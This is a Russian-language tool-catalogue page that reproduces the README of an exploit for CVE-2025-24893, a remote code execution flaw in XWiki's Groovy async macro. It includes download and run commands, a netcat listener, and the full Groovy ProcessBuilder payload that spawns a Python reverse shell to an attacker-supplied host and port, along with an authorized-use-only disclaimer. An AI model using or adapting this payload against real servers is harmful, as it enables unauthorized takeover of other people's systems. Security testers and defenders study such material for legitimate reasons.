Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-24893 — Модифицированный эксплойт для CVE-2025-24893 | Kitploit
Инструменты/GitHubGitHub/hackersonsteroids/cve-2025-24893
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Модифицированный эксплойт для CVE-2025-24893

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893 XWiki RCE Exploit

Exploit Banner

Простой скрипт на Python3 для эксплуатации CVE-2025-24893 — уязвимости удалённого выполнения кода в XWiki Platform, использующей асинхронный макрос на основе Groovy и настраиваемый payload для обратной оболочки.

⚠️ ВНИМАНИЕ: Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.


Содержание

  • Возможности
  • Требования
  • Установка
  • Использование
  • Определение протокола и запасной вариант
  • Payload обратной оболочки
  • Лицензия
  • Отказ от ответственности

Возможности

  • ✅ Автоматически определяет, поддерживает ли цель HTTPS или HTTP
  • ✅ Формирует Groovy-фрагмент ProcessBuilder для обхода особенностей Runtime.exec
  • ✅ URL-кодирует payload XWiki async+groovy макроса
  • ✅ Настраиваемая обратная оболочка (хост + порт)
  • ✅ Выводит код HTTP-ответа для проверки доставки

Требования

  • Python 3.6 или выше
  • Библиотека requests
root@kitploit:~
pip install requests

Установка

Клонируйте этот репозиторий:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

Использование

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> Хост XWiki (например, wiki.example.local).

  • <LHOST> IP вашей атакующей машины (где запущен ваш слушатель).

  • <LPORT> Порт вашего слушателя (целое число).


Пример

  1. Запустите слушатель на вашей машине:
root@kitploit:~
nc -lvnp 4444
  1. Запустите эксплойт:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. В случае успеха проверьте ваш netcat-слушатель на наличие оболочки.

Определение протокола и запасной вариант

Перед отправкой payload скрипт:

  1. Пробует https://<TARGET_DOMAIN>
  2. Если HTTPS не работает, переключается на http://<TARGET_DOMAIN>
  3. Завершает работу, если ни один из протоколов недоступен

Это помогает обеспечить совместимость с развёртываниями, использующими смешанные протоколы.


Payload обратной оболочки

По умолчанию скрипт использует однострочник на Python3:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • Вы можете изменить функцию build_payload(), если вам нужна другая оболочка (например, Bash, Perl, PHP и т. д.).

Лицензия

Этот проект лицензирован в соответствии с лицензией MIT. Подробности см. в файле LICENSE.


Отказ от ответственности

Этот инструмент предназначен только для авторизованной оценки безопасности и образовательных целей. Авторы не несут ответственности за неправомерное использование. Всегда получайте явное разрешение перед тестированием любых целевых систем.

Скачать инструмент